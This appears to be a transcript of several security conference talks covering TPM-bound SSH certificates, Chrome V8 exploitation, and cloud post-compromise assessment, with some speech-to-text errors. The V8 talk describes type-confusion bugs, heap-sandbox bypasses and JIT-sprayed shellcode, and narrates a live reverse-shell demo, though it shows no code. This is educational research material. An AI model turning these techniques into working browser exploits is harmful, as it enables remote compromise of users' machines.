cool little hack. So the way this works is that we make a key, which is supposed to be the CA key. We set up a configuration, which says which SSH host that we want. We give it a CH file that is supposed to sign the request we want. And then we just give it a list of users that have access to the server. So in this case, this is my user. I've decided that I wanted to use GitHub. My email is the one that I should preferably be logging into when I use this tool. And EK is the endorsement, hard-coded endorsement key, which is part of my machine and sort of the thing I have to use to do the machine identification.

So to getting the endorsement key from the machine, I didn't get to figure out a better way to do it. So I wrote my own little tool. And this is sort of the hash of the public part of the endorsement key. And that's to make sure that we have it enrolled before we use this, because it's hard to establish this key after the fact. So it's preferably done as part of enrollment procedure. So you had some enterprise getting the endorsement key and before handing it off to the user. And that's the way to prove that the machine is ours. Running the SSH, the CI server, currently just does the local host thing, all standard. And the client setup is the interesting part,

because this is part of the SSH configuration to client. So SSH supports something called match host exec. And that means that if you match on some host, it's going to run a secondary command. In our case, we have our special SSH CPM add command. which just communicates with our CA with our host and our username. And that's sort of what's fetching the certificate from the CA server into our agent before authentication starts.

So that the station protocol itself is, what should I say, not huge, but a bit complicated. So I did a blog post explaining this a few months ago when I originally wrote this talk. But I'll try and explain it here as well. Hopefully some people find it interesting. So it serves as two endpoints, one's called Attest and one called Submit. Attest is the one that we use to initialize the authentication towards CA. We don't know what the CA has, but we have to provide our username. which host we're using, and the endorsement key. And then submit is the two challenges that we need to do through our identity provider and the credential protection. So we did creation of two keys, which is the

attestation key called the AK, and the TPM bound key, which is the key on the machine that we are supposed to be using. We submit this attestation. The OpenID Issue Challenge is effectively the CA verifying that the identity provider has given you valid credentials. We decrypt the credential on the client, and then we submit all of this. And back again, it provides a signed estate certificate that we throw into our agent. So the way this works is the bound key. We do a TPM to create command, which gives us back that station keys. Certified creation is the one that we do to make sure that the key itself is part of the TPM. So this

is the agent communicating with the TPM. We do the same dance again for the TPM bound key, which is the agent communicating with the TPM. We do a creation, and then we certify the creation. That's going to give us that the station of the keys. The station itself is that we give all of our SSH hosts, the SSH username, and the keys that we created. The CA authority is going to do some pre-validation of all of these things, ensure that it exists in our configuration, ensure that we have these things well designed. And we're then going to create two secret values, which is then done with the credential protection, and the nonce, which is then used by the OpenID Connect

and we send this effectively back. So the client doesn't know which OpenID Connect server it uses, and it doesn't know anything in front of the request itself. This is represented as some goal structures, which is translated to JSON. So we have the attestation parameters, which is the host, the user, and the attestation information. All of this is just flat JSON with some base64 encoded strings. And back, we get the interesting part, which is the credential and encrypt the blob. We get the secret, which is the public part of the shared secret that we do, which is part of some elliptic curve Diffie-Hellman challenge itself. OpenID YDC is the issue that we're supposed to be communicating with. And the nonce is part of the

OpenID Connect challenge itself.

OpenID Issuer Challenge, that's the agent connecting to the OpenID Connect Issuer. So we do a login flow with the non that we set ourself, and we get the JVT proof back, which is signed by the OpenID Connect service or provider. The agent is going to chat with the TPM and get the credential decrypted. And because we used the public part of the endorsement key and the station key, This can only be encrypted if we also have the private part of the endorsement key. Back is going to be the credential, which is the random string we had to send back, which proves that the machine is authentic to the CA. And when we submit this to the CA authority, we send back all this information.

And the CA authority is going to check that everything is valid. It's going to take the OpenID Connect JVT proof, check with OpenID Issuer if it's actually signed. It is then going to check that it has all of the correct configuration that we want, and then ensure that the decrypt the credential from the client is the same as the one we try to send. It will then take the public part of DPM, synthesize SSH key, and then send this back to the agent itself, which is what allows us to sign this thing.

So the challenge response here is the which we send from the client to the CA before we get SSH certificate back is a secret, which is the decrypted blob, and a JVT string, which is the proof from our OpenID Connect provider. And back we get the signed SED certificate, which is the byte string that we'll throw into our agent. And the end result of all of that is that we get two keys. One is the private ECDSA key, which is part of the TPM agent, and then the certificate, which is part of the or the certificate that we use to validate the connection itself.

So improvements. Is the protocol good enough? I don't know. I am sort of an open source hacker dude. I'm not just like a proper security engineer, so I have no clue if this protocol is good. But it works, and it gives us some stronger claims on our SSH keys. We should probably do some more pinning of the platform keys. We can chain the entire endorsement key back up to the manufacturer, including the serial number of your machine. I need to figure out how that works. I know Teleport does part of this as part of their enrollment procedure. And SSH is a bit lacking. So when you get a signature request from SSH, the agent doesn't actually know which server it's signing something for.

We only get this blob, please sign this with this key. And we don't know any metadata around the server. It would be preferably better if we could have some way of like a signed statement from the host keys saying, this is our metadata, please sign this. Because it would be easy for us to reason about what we actually want to sign in context. There's also an entire extension thing with SSH agents, which we can only control if we actually re-implement the SSH client itself. And it would preferably be a good idea for SSH agents either to be able to offload this to another agent or something else. So there's a bunch of issues with OpenSSH as well. So yeah.

So, I've now shown how we can sort of do TPM bound keys with SSH. We have written some CA authority that is able to take machine identity claims and machine identity claims and sort of hand out short-lived SSH certificates. And we can use this as part of our authentication scheme towards our SSH servers. All of the source code is public, it's on the GitHub. There, if people want to take a look at it, I would probably say it's more of a point of concept than the finished thing. But the TPM agent itself is used by multiple people in this room, I think, maybe. So that's something you can look at if you find it interesting. If you have questions, I have a blog, I

have an email. I have a mastermind account if anybody wants to look up that. And my GitHub is Foxborne as well. Thank you. Thank you very much. Thank you. And now we will, is it okay if we take questions in the break? Sure, that's fine. Yeah. You're around for the rest of the day, right? Yes, I am. Excellent. So find Morten and geek out on SSH TPM solutions. And now we have a break until 10.55. We'll see you back here then. Yes, thank you. Thanks.

Welcome back everybody. Hope the coffee is still flowing freely. We have another in-depth talk here from Matteo Malvika, international speaker who is now at home in Norway, like myself and many others here today. So that's great that we We have this information security community and there's a certain poll that we get to have the mutual benefit of international input. Matteo is working with Offsec and part-time with Outflank as well, Red Teamers. His work is focused on vulnerability discovery, exploitation and mitigation. So I will let him introduce himself further and take it away. Let's hear it for Matteo. Hello. Does it work? Yeah, I think so. All right, all right. Good morning, everyone, and thank you

for being here. Today we're going to dive into Chrome exploitation. We'll go through the inner workers. of Chrome architecture focusing on the V8 JavaScript engine and its exploitation pathways. Turn it on. Yeah. So, we'll start by exploring the Chrome architecture and the V8 pipeline to set a foundation for understanding how things work under the hood. Then we'll take a look at vulnerability class named type confusion. will serve as a stepping stone into discussing the three CVs for today. The first one predates the V8 Heap Sandbox. Then we move to modern sandbox there with the second CV. We wrap it up with the third one, which serves as a fresh example of present-day mobility. So, technology is not with us today. Okay.

All right. I haven't done anything. know.

Yeah.

It's because I have too many slides, I guess.

Nope. We had the whole break to get this working. Yeah, it was working. Yeah. It's luck.

now than later. I don't see. Now it's black. Can we try with this?

Yep.

I see the projector. Yeah.

Do you see a signal?

Does it work?

This is the tough part of having demos on everybody's personal PC, but we're in it to win it. Cool.

Nice. Nice, nice, nice. Thanks, guys. Cool.

So hopefully it's less boring now. As I was saying, we wrap it up with a third and last one CD, which serves as a fresh example of present-day vulnerabilities inside Chrome. Let's get it started. My name is Matteo. I'm a content dev and researcher at Offsec. I'm Italian, based in Norway, and occasionally I play drums in a local indie band.

Where do we start? A bit of context before we jump headfirst into details. all of this matters. So browsers are one of the most used software worldwide, right? So they are valuable targets for attackers. And they are always connected, so they allow for any bug to be explored and then can be pivoted as remote code execution. They also demand speed, right? We always have, like, dozens of tabs open all the time on our browsers, so they need to be fast and memory efficient. That's why we have JIT compilers. And JIT compilers, as we see in a second, they are really complex software. And we know that complex software leads to bugs.

So, let's get a brief overview of Chrome architecture before we start. But today's focus is Chrome, and it's JIT engine called V8 on Windows. Why Windows? Because it's most rolled out. operating system in target in today's enterprises. So that's why Windows. That's going to have a brief overview on Chromium architecture. So as many browsers, Chromes run on multiple processes. The main process communicates with multiple isolated rendering process through interim process communication or IPC to keep the renderer isolated.

is a renderer process and what it does, actually. So, each renderer process is responsible for rendering JavaScript, DOM, and CSS, amongst other things. As you can imagine, the renderer process is the most vulnerable piece of the chain. It's ingesting all the untrusted JavaScript code. And to protect each renderer process, we also have the process sandbox, which is outside of the scope for today's talk. So we normally have a sandbox on top of each process, which is called process sandbox. But before analyzing the first bug today, let's discuss how V8, the JavaScript engine, works under the hood. So from a bird's eye perspective, from a bird's eye view, that's V8 operation. So ideally it also applies to other JavaScript engines for other browsers. What we have, we

have a parser, interpreter, and an optional compiler. So the parser is one responsible for processing the JavaScript source code. So it breaks into token and generates an AST, an abstract syntax tree. The AST is a structure which represents the code syntax relationship. And those tokens are barely like if you have a statement like X equals 10, Each token is a single individual representation. So the parser generates this abstract syntax tree, which basically represents a hierarchical structure of the different code tokens. Then we have the interpreter, which takes the AST, this tree as an input, and generates bytecode. Bytecode is just an intermediate representation of the program. which is designed to be executed by the interpreter of virtual machine. And the

interpreter originally could just execute wherever JavaScript locally. So from the VM, it could just generate machine code and via the virtual machine and generate it. So back in the days, browser just had the interpreter mainly. But suddenly... we need, as we anticipated, we need speed. We need good memory footprint, right? So, we need a better way to optimize the machine code. That's why we have compiler. So, and some of these compilers are just-in-time compilers, which means they are generating optimized machine code in runtime, right?

This is a more actual view of the V8 pipeline from 2022, so two years ago. What do we have? We have the parser, which again, output and abstracts and it gives it to ignition, which is the interpreter. Then we have, as I said, we can have just local context execution from the interpreter. However, One of the responsibilities of the interpreter nowadays is to generate statistics and data about what's going on, which kind of function are executed, and this is done through the profiler. The profiler sends and marks as hot code whatever function is executed multiple times. So, let's say we have a function that is executed like 10,000, multiple times even more, and then at

that point the function is marked as hot code. or hot function, and this is a signal to the JIT compilers. Two years ago, we had two different JIT compilers, Trubofan and Sparkplug. So Sparkplug is the non-optimized compiler, and Trubofan is the optimized one. We'll see what's the difference in a second. So basically, whenever we have a hot code, so function that might be executed a lot of time, then we kick in with the JIT compilers, they do their optimized code, and then the function gets executed. Sounds simple. So this is the actual two days pipeline. So there's a new actor called Maglev. So in December 2023, last year, Google introduced a new JIT compiler called Maglev that acts as a as a compromise between Spark

plug and Turbofan. So, actually, we have a four tiers pipeline. So, we have four actors that can execute code. Ignition in a more simple way, and then we have the three JIT compilers. All three, they can generate different kind of optimized machine code, but they are fast and optimized in a different way. For instance, TurboFun is one that has generated the most optimized machine code, but it's also the one that takes a lot of time to produce that code. So, in case we have some JavaScript code that requires to be optimized quicker, then we might use Sparkplug or Maglev according to our needs. So, let's get now a brief review on JavaScript types, bytecode, and the entire JIT compilation

pipeline. How actually JavaScript gets executed in V8, as we say, ignition is not optimal. The interpreter just execute JavaScript code through the virtual machine. It's not optimized at all the machine code that it produces. But anyways, let's see how JavaScript code works behind the scene.

The interpreter, as we said, just takes bytecode as an input and execute it via the JavaScript virtual machine, right? And the virtual machine is responsible for executing the final bytecode, right? So, but what is actually bytecode in the end? So, this is a simple example of bytecode. We have a function that adds two

to whatever property we are sending in. So we are calling the addTo function and the function takes property X of an object and adds to it. So the first line is responsible for loading an SMI. What is an SMI? It's a small integer into the accumulator.

So, in JavaScript virtual machine, we have virtual registers as a virtual machine. One of those registers is the accumulator, which is not an actual physical register as you would have in a CPU. The accumulator is just a virtual register, but this is very handy to do short operation. So, in this case, we load two in the accumulator on the first line. Then, we store the value in the accumulator into R0. So, store A into R0. And then, on the third line, call getNameProperty, which basically we load the function argument A0, so the first one, into the accumulator. Next, we add whatever we have in R0, in this case 2, and whatever we add to the accumulator value, in this case 13, because we are

passing 13 as an argument. Then we return on the last line 15 from the accumulator to whatever calling function had with just a simple bytecode example. So, we also have just-in-time compilation, as mentioned. So, the interpreter-generated code is not optimal, right? When functions are executed too often. And how do we solve this? With just-in-time compilation, right? So, but first off, we need to solve some issues with the JavaScript language. How do we store type information?

As JavaScript is a dynamically typed language, the engine must store type information with every runtime value. This is in VA, this is accomplished through a combination of pointer tagging and the use of dedicated type information objects that are called maps. Here we have all the different kind of objects that we can have in the JIT engine, basically. We have SMI, small integers, and everything else is a heap object. So the engine treats everything as a heap object, right? And among these objects, we also have something called map, which is really important for our focus today. In the end, the engine is marking as the least significant bit, zero, anything that is an SMI, and with one, anything that is a heap object. So the least significant

bit plays a crucial role how the engine treats object or small integer.

We mentioned that JavaScript is a loose type languages, so the compiler doesn't know the data types in advance. But it learns from the past round and guesses how the code will be used in the future. And it makes optimization based on those assumptions, like creating faster code, assuming the types will stay the same. As we mentioned, how actually does JavaScript keep track on data types? More on that in a second. But in C++, for instance, we have this simple function that adds to integer, and we can produce fairly consistent assembly code, right? Because

it's a language with strong types, right? JavaScript, however, on the other end, it doesn't. So we don't know. which values will be passed to this function beforehand, right? So we need to keep track of data types. How we do that? With maps. There's a really key feature in V8 in the JavaScript engine, but they also refer as hidden class in the JavaScript specification, or shapes in SpiderMonkey, which is the JavaScript engine for Firefox, or butterfly structures in JavaScript core in Safari, or hidden types in Chakra, which is the old Edge. So really not confusing at all.

But in this case, maps. So V8 and Chrome, they use maps. So we will stick with this terminology for now. And in this example, we have an object with two properties, 1 and 2, so two small integers. So let's see how they do look like in memory. Whenever we need to debug something in V8, in the JavaScript engine, and we compile it, we don't need to compile the whole Chromium project, because it takes five hours on a beefy PC today, so it takes a lot of time compiling the whole Chrome. We just need to compile V8, and it comes with a handy tool called D8, which is debugging engine. We can debug V8 through D8, which prints a lot of different values, and normally we

wouldn't be able to. In this case, we are printing object 1, and in the green box, we have the array, right, with all the elements of set, and then in red, we have the map, okay? At that address. Let's add a second object with similar types, with same types values, but different values, actually, same type, different values. So, guess what? We just print object 2 in memory, and we have the same map, meaning that object with the same maps. They will share also the same map in memory. This is a way for V8 to be efficient so we don't create a new map for objects that share the same types, right? And they also share the same fixed array. So we mentioned

TurboFun in the beginning, which is the optimized JIT compiler in V8. Let's see how it does look behind the scene, right? So it's the optimized JIT compiler. We have three JIT compiler now. We have Sparkplug, we have Maglev, and then we have TurboFun. And it basically takes the bytecode from the interpreter and it creates an intermediate custom representation also IR, which is a graph basically, with nodes, which are code operation, contraflow edges, and dataflow edges, which are the input and output of the bytecode. So how it does operate, actually. And IR graph is built by analyzing byte code and type profiles, formulating speculation about types, and possibly guarding them with speculation guards, more on that later on

speculation guards. So once the JIT compiler is happy with the graph building, it starts with the important phase of optimization, so the JavaScript is improved. and the memory footprint is reduced. And then we have the last phase, which is lowering. So it basically pushed the optimized machine code to memory for optimal execution. Cool. So we mentioned speculation guards. What are speculation guards? So there's no guarantee. We have no guarantee that the maps will stay the same for a given object in time, right? So JavaScript is a dynamic language, so that changes. Ignition interpreter generates feedback which is used by TurboFun to make speculation about the type of a given property, for instance. And then TurboFun uses something called

speculation guard to make sure that we don't have bugs as much as we can. We don't have bugs that are hitting type of the property. So in this case, we have two examples of sure if the pointer works. But the first one, it's the speculation that makes sure that we are dealing with an SMI. We mentioned at the beginning that every SMI has a least significant bit of zero. We're making sure that if not, we bail out. So we tested that actual property is a small integer. If not, we bail out. What does it mean we bail out? We don't crash the process, obviously. Otherwise, it wouldn't be reliable. What we do here is we simply de-optimize the machine code. We go back to the

interpreter and tell the interpreter, okay, just generate not-optimize code because clearly we have something wrong going on. And we cannot risk of using a map that is not what is actually... that is not representing the type, the correct type. In the second example, we're actually checking the pointer, pointer by RDI. a given map. And if that pointer is not matching the given map, then again, we bail out and de-optimize the code. That's in general.

So let's move on to JIT. So everything is nice and fun. We have JIT compilation. And we mentioned that we can have something called hot function. In the beginning, we have something here, an example of a hot function. So it's simple. that adds to property of an object and execute that function several times, 10,000 times here, and we assign I to both property A and B at runtime. So at this point, the interpreter should be smart enough and seeing a TurboFan, hey, we have an ad function, so this stuff gets executed all the time. We have to do something. We have to produce optimized code. I'm not capable enough to optimize in code, right? So, one of the

optimization features of the JIT compiler, for instance, is something called redundancy elimination. In this case, again, we have a function in foo that returns the sum of two properties. This features, basically, it's a class of optimization in Turbofan that aims to remove safely checks from the metered machine code. If it thinks it's unnecessary, basically, Here we have the check on the object, right? The check heap object and check map two times, right? On the first block and on the second block. So, TurboFan just decides, okay, why don't we remove the second check? It's just repetition. It's unnecessary. However, are we really sure that we cannot have any possible side effect in between elimination? What can possibly go wrong here?

Right, let's introduce a bug class called type confusion vulnerabilities, which is a fairly new vulnerability class. So, JIT engines are complex because compiling at runtime requires balancing, speed, optimization, and security coding. Bugs arise during JIT compilation due to missing checks. That's basically what are type confusion. As we said, JIT engines are highly complex systems, so we have high chances of bugs. The JIT engine assures that data is of one type at compile time. However, due to side effects, unforeseen side effects of JavaScript operation, sometimes at runtime, that data type changes without the related type checks. So we are missing the right speculation guards, for instance. can have something that goes wrong here. So type confusion might lead to out-of-bound read and write, and ultimately code execution.

So the important key takeaway here is that we have a logical bug that turns out to be a memory corruption bug, which can open also a discussion on Rust, on safe programming languages, and so on. But let's not digress. Let's discuss now the first one of the three bugs. So, the first bug here is a very typical type confusion and predates the heap sandbox. So, we can get a sense of how V8 bug can get exploited without extra mitigation. So, this is a bug that's been filed by Samuel Gross from Project Zero. which is, by the way, he's also the author of the modern V8 heap sandbox. In this line, the yellow part is basically the root cause of the bug. So here, the KNO-write operator states that

the engines assumes that this operation will not have any observable side effects. So basically, the objects map here changed without becoming a prototype. What's happening here is that we call the map get object create map. What this function does, basically generates a new map for a given object. However, the newly created object is converted to a prototype object, which also changed the object associated map. This is a kind of unforeseen side effect that the JIT compiler hasn't taken into account.

We have something called maps confusion. It's just my definition, but it's also specific type confusion when you're actually confusing maps, which happens a lot of time in JIT engines. In this case, we are analyzing the buggy code, the buggy in V8 version. We print the object. We invoke the vulnerable function, object create, and then we print again the object and see what happens. So, the first time we print the object, we have a map of fast property types. The second time, the map changes magically. It's dictionary properties now. That's not good because we should have a deterministic map as much as we can. If the map changes and the type is not checked, we are

able to abuse this situation. So, I'm not going to cover all the exploitation steps because that will require of time for each bug, but from high level,

whenever we obtain relative read and write primitives, from that we can obtain arbitrary read and write primitives. And then what about code execution? So we are able to write and read in the V8 heap arbitrarily, so how can we execute our shellcode? Especially because the V8 heap has an X, so we cannot execute code here. PageR, read, write, but not executable. What do we do? Let's enter WebAssembly, and specifically WebAssembly shellcode. So WebAssembly is an in-browser client-side aid for lower language type like C, lower level support for C or C++. It's compiled by another entity called the Liftoff in the Chromium. And we also, to reference WebAssembly code in V8, we have something called Jamstable.

Basically, they are Jamstable to webAssembly function. And those pages are rewrite executable. So, yay. So we can basically execute one shellcode and reference it from V8 heap. So this is the first demo, which is prerecorded. Here we can just test the whole exploit and get shell from our Color Linux. Cool. That's the first one. Moving on. Second CVE. This is a modern-era sandbox bug from last year. It affects Maglev. We mentioned the new compiler, Maglev. This bug has been discovered by Man Umo from GitHub Research. So, as anything new, With any software, it will bring bugs to it, right? But before analyzing bugs itself, let's first explore what is the purpose of the heap sandbox, which is one of the goals of our presentation. So we

mentioned the process sandbox at the beginning, right? The process sandbox is the sandbox that is actually protecting the entire render process or other Chrome processes. This has nothing to do with that. So this is the sandbox that is supposed to protect the actual heap in the renderer. Up until now, we needed just two vulnerabilities to get system foothold via a browser exploit. We needed two vulnerabilities. One on the renderer and one to escape the process sandbox, right? And we could get on the host. Now, the situation is a little bit complex, more complex. We need three vulnerabilities or two bugs and one bypass. Again, the renderer, then we need the heap sandbox bypass, and then the process sandbox. So the cost for

attackers is definitely increased. How does it work? How the V8 heap is actually working? So it's been rolled out around 2022, three years ago. It's software-based, and it runs in an isolated heap. So the V8 heap is contained basically in the sandbox. also as a cage or Uber cage, which is a predefined memory region that is defined at startup. And we have something called pointer table, which is the essence of these sandbox, basically. So objects inside the heap are referenced via offset and indexed into a pointer table that exists outside the V8 heap. So what's the deal with that? Basically, we don't have full pointers anymore in the heap. So what were possible in the past that we normally, in a typical bug like the first

one we mentioned today, we had something called Back-in-Store Pointer in an array buffer. This is an array buffer dump. In yellow, we have in the first output, we have something called the Back-in-Store Pointer. So we have a full pointer that can be used to obtain arbitrary read and write primitives. And with the heap sandbox, we don't have it anymore. We just have a 45C, which is an offset to the jump table. Not jump, how it's called. The pointer table, sorry. Not jump table. However, we have an offset, not a full pointer anymore. So we cannot do much, right? So we just have an offset. So one of the goals of the heap sandbox is to remove all the in the V8 heap. So,

attackers, even though they get read and write access into the sandbox, they cannot abuse it that much, right? So, let's go back to the second CVE and its analysis. We mentioned that Maglev is a new compiler, rolled out last year. It's mid-tier compiler that balances efficiency between Sparkplug and TurboFun. It generates less optimized code, but it does it quicker than TurboFund. In some cases, you want to use Maglev instead of TurboFund. This is done behind the scene by V8. You don't have to configure anything, but this is a logic that is implemented in the engine. The bug itself is a failure check while creating a default receiver object. Again, the same map is used for a different type. Sounds familiar? Again, maps confusion, which leads to

type confusion. Okay. What's the deal for us? So, standard WebAssembly shell code is not possible anymore due to heap sandbox. So, we cannot reference it anymore.

But we can still read and write some function pointers, right? Because we mentioned that the heap sandbox has been rolled out two years ago. But until recent times, it wasn't fully completed. So, they rolled out, but it wasn't as perfect as it is today. It's not perfect today, but it's better. So, back then, last year, not every pointer was actually an offset. That's the whole point, right? So, JIT compile function pointers are represented as full pointers

from the V8 heap perspective, so we can still abuse those pointers. How we do that? can modify those function pointer to jump right into JIT spring shellcode. What the heck is JIT spring shellcode? Let's see what it is. It's a fairly new technique. Like it has one or two years old. Something like that. So basically what do we have here? We have an empty function that is just returning three floats. 1.1, 2.2, 3.3, right? Then we JIT compile that function. And as a last statement, we just print the function and see how does it look in the debugger. Let's see how does it look. So this is from WinDBG. So that's the Jeet optimized code from the function, right? And

what we see here in the red block is that basically that number is moved to R10. And we have the same for the other two numbers. So likely those are our floats, our three floats. And if we convert that value into double, that's 1.1. So that's our first float. But what's the deal? Why is helpful, this? Well, what if we could treat this float data as a code and not data? So let's change those three values or float value in something completely that doesn't make sense, apparently, and three random floats and see how this looks like in memory. So we dump the same value, and instead of dumping the value, we disassemble it. And guess what? Those floats are converted to assembly. So we have one

breakpoint and a few knobs. So the idea here, we can basically jump over those floats value that suddenly are interpreted. We can interpret it as instruction of our shellcode. And we jump over those unnecessary VAMOV keywords instruction. are not necessary. So basically we jump between chunks of shellcode of our choosing. The only caveat here is that we can only encode six bytes at a time. So we have six bytes or shellcode and then the jump instruction. But we can generate that shellcode pretty easily with the PwnTools. I haven't found a better way to do that, sorry. But that's what we have. PwnTools, we can write the shellcode as ASM, as always, as assembly, and then print it out as JavaScript floating points, right, values.

And then we replace this shellcode inside our exploit. So we have a tool that can generate that. We don't have to do that manually. So let's demonstrate the second exploit with the second demo. Yeah.

Here we're getting calc because I was lazy enough to get a full reversal, but that's code execution on Windows. So the last CV that I'm going to present today is pretty recent. The write-ups were for August.

This is another type confusion found by Manu Wimo, again from GitHub research.

So, this is another type of confusion in maps via the prepare for data property. Basically, when an object structure changes like property addition, a new map is created. And it, of course, the bugs happen while transitioning

from one map to another without the expected checks. Again, similar to what we saw earlier, but in a different piece of code. So how do we perform the sandbox escape? So previously we used JIT compile pointers. But now in this latest version of the heap sandbox, the WebAssembly pointers are gone. So we cannot abuse those anymore. We have something else in Chrome called Blink. is responsible for rendering web pages like process HTML, CSS, layout, and DOM, but lives outside V8, so it is not part of the JIT engine. However, inside V8 heap, we can reference those objects by embedder fields in the heap. Obviously, those objects are referenced as offset, as we saw the heap sandbox definition. So we don't have full pointers, but we just have offset. So

what if we can cause a second level type confusion by swapping those offsets? And yeah, so we basically have read-write primitive outside the V8 heap. So we are not actually bypassing the V8 heap sandbox per se, but we just leave by the rules and, yeah, apply the read-write primitives by the offset, not the full pointer. So with that, basically we are leaking the trusted cage base, which is the heap sandbox base address, so we can get full write primitives, and locate the address of the JIT compiler, we have assembly through the import target, so we have the import target function in the dispatch table, and then we hijack the code pointer DOM RectX, basically the properties of

this object, which is one of the objects from blink that we are abusing, which lives outside V8. So basically in the end we are hijacking WASM, JIT code, when the exported function is called in the end. So under normal circumstances, calling a WebAssembly function alone will let it just execute it inside of WASM. So, sort of sandbox with no interaction with the rest of the system. But this way, we are creating time confusion inside external V8 objects. So, for the last demo, I decided to do it live on a box that is home. Let's see if it works. It's a bit risky. Let's see.

How do I share this? I think I need to stop presenting.

I'll do a share. Give me a second. Hmm.

Give me a sorry. Give me a second. Okay. Maybe.

Yes. Okay. Cool. All right. Can you see anything? Yes. So we have our color Linux listening on port 443. We have a web server in Python that's serving the exploits. And then we have the official Chrome build. The thing that I didn't mention, that here to the back, the whole exploit, we couldn't just have V8. We had to compile the entire thing inside Chrome, because The object that we are abusing in the end, they are from blink. So let's start Chrome with the no sandbox option, meaning that we are not going to test the process sandbox. So what we do here is that serve on the vulnerable server and the vulnerable... yeah. And then we get a shell on Kali. Yes.

That's a full reverse shell. Yes.

Thanks. So, a few key takeaways from this. As we said, browsers are complex, high-value targets for attackers. Type confusion bugs will likely persist in V8 due to Jita nature. Because it's a complex piece of software, we're going to have bugs, no matter what. However, the 8-heap sandbox increased the attacker's cost, but as we saw, it's not bulletproof. So we're going to have bypasses likely until it's going to be rolled out with full hardware support likely. Now, the end result says three bugs are now required to get a full system shell. All the bugs for today, you can find it on this website. Thank you.

Yeah, amazing. So that's why we had to go through all the hassle with these million different adapters up here to finally get this working so that we could do a real live demo. Three terminal windows live before your eye. Thanks, Mateo. He'll be here for the rest of the day? Yeah, great. Thank you very much. All right, moving right along. Fine, Mateo, if you have questions, we're gonna move right along with the schedule. Next we have Karim. That's my best pronunciation, apologies. He'll tell you his name. Thank you so much for joining us and for O3Cyber also supporting B-Sides here today. So now we got something a little more blue teamy. You see how we do that? We go back and forth between, let me just

stick this in your pocket here. back and forth between the red and the blue and we make that beautiful shade of purple just like the 03. I have it. Oh. We're switching it up. I'm on mic two. Yeah, mic two and mic three is going off stage. All right, let's hear it for Karim. Thank you.

So my talk is named Post Compromise, Uncovering Clouds and Assessing Risks. Just really quick about me. I'm a principal at O3Cyber, and I do multi-cloud security. Let's just jump right into it and try to kind of set the stage here that's going to be with us through the entire presentation. So, in this scenario that we're going to live through in the presentation, we're going to be a multinational corporation. And we've been affected with malware or ransomware in this case. That's kind of going to be what drives us in this scenario initially. So we have a ransomware that's affecting most of the infrastructure, and we have limited access to our documentation and existing information because most of the systems are down or being recovered

in this case. But what about the cloud here? So the attack we're talking about in this case only affected the on-premises infrastructure. not the cloud. So, my first question is, well, what about the cloud environment? You're an multinational corporation, you have a large footprint, you definitely have some cloud in here. So, the first question is, like, what clouds do they have here? Because there's, again, there's no documentation. There's some guys that knows where all the infrastructure is in the data center, but there's really no one that has a full overview of the cloud in this organization. So, The first part of the journey here will be to find out what clouds are there. We're equipped with what I would say is the equivalent of a Swiss Army knife for

most of the people in this room, which would be Python, PowerShell, a 5G router, and some duct tape. And we're going to start finding the clouds here. So we know the organization has cloud, but we don't know who is using cloud. We do have an idea of what it's being used for. But where do you start finding out who owns these clouds because our CMDB is down? So I guess the first step is you start searching through some SMP logs. You look for senders such as wildcard at amazonavs.com or wildcard at azure.com or cloudnoreply at google.com, which kind of gives you an idea there. You can also proceed to search the certificate transparency logs, what certificates have been issued or

wildcardiordomain.no. And you can also try to enumerate any subdomains to see if there's some data on subdomains that have been registered or are registered that's being hosted in the cloud. And when you do that subdomain enumeration, you're probably going to get some IP ranges, like what's the IP of the asset. You can then take, download the IP range of the different cloud providers and you can see if you can match the IP of a public cloud provider to the IP where your assets are running if they're not already fingerprinted by the service you're using to look for this. What else can you do? Oh, you could normally read the documentation, in this case you can't. I've also uncovered a bit of

shadow IT or clouds by making friends. So lunch is a really good opportunity. Find some guys with some print on their t-shirt. Maybe they have a b-sized t-shirt or something else. Or maybe they have a Kubernetes t-shirt. They're even more likely to run cloud. Or look for people with stickers on their laptop as well. Maybe they have a cloud sticker there too. And then you'll know that they might know more about the cloud as well in the organization. So in this scenario, we've We found some cloud, we found a significant amount of cloud. We found three AWS organizations, we found a Google cloud organization, we found two and three detenants that both had subscriptions in them.

And of course we found Alibaba cloud, but that was out of the scope in this case. So we're not going to cover that in this session. With this significant cloud footprint, it kind of sets some rules for how can you go about this. Because maybe you have developed a tool to do this efficiently in one cloud, but now we're talking multi-clouds, so you need to find approaches that will work and scale here. Let's kind of give this cloud footprint or cloud estate that we've found some remarks based on like our initial look. So, multi-cloud, that's the obvious one. There's no hardening, meaning there's basically poor configuration of most resources. There's no logging besides defaults, and we're going to look

into that. There's no governance. The GRC team didn't know much about the cloud environment. There's access keys and clear take secrets floating around. Misconfigurations are prevalent. And of course most of the things has been clicked or some people have deployed stuff using the CLI. So, this is the basis. Where do we even start? So we need some sort of a process here. And you can kind of follow a simple instant response process as well. You kind of start with investigation. Look at the things that are there. Now if you're finding any signs of compromise, you need to do some sort of containment and eradication. And then you can proceed to eliminating the risks once you've performed those steps.

So, the first thing we're going to do is, of course, going to be the compromise assessment. And doing the compromise assessment, it's important to keep in mind how the public cloud works, because you have the cloud control plane and you have the cloud data plane. And a compromise could occur both of these domains, and it could also occur in one domain and move to the other domain because of how these domains interact. In this scenario, we're going to start looking at using the control plane, and we're later going to move into the data plane and see how we can do investigation there as well. So, when doing a control plane compromise assessment, to call it that, we first start with the logs. We can

also utilize the control plane to identify possible persistence. It could be identities that have had a key added to it. It could be secrets that you found in clear text configuration that is now being used. It could be virtual machines that have been spun up or compromised through the control plane. It can be resource configurations that are weak and being used to gain persistence. Or it could be on the network level as well. So, the first thing we're going to do is focus on just getting all the logs. Getting all those logs from the cloud control plane. So, we wrote the cloud log collector, which interacts with the different cloud providers using the rest APIs. So, for Google Cloud, we're using the cloud SDK. It handles

the authentication and it allows us to really simple extract the different logs. For Azure, we're just using the SDK for authentication, because that flow is a bit complex to write yourself and it works really nice with the SDK. But I don't like the Azure SDK, so to do things fast and at scale, I'm using the REST API instead for Azure, only using the SDK for authentication. For EnterID, we're also using the REST API towards Microsoft Graph, and we're using the same SDK for the authentication here as well. And for AWS, we're only using the SDK, which is named Boat03. I don't know why.

So, with that, like I said, there was no logging enabled, but what does that mean in the context of cloud? Well, luckily, you still have some logs in the cloud when there's no logging enabled. So, if you look at AWS, we have the log type of CloudTrail, which is the API logs for AWS, and they have a default retention period of 90 days. It's not so straightforward to just, well, I just want to get all those logs for the last 90 days, and I'm going to show you how that's handled in the cloud log collector soon. In GCP, you actually have 400 days retention period of the admin activity logs, which is really beneficial if

you have a compromised GCP environment. And you also have 30 days of data access logs, which you don't have in any other cloud providers at all.

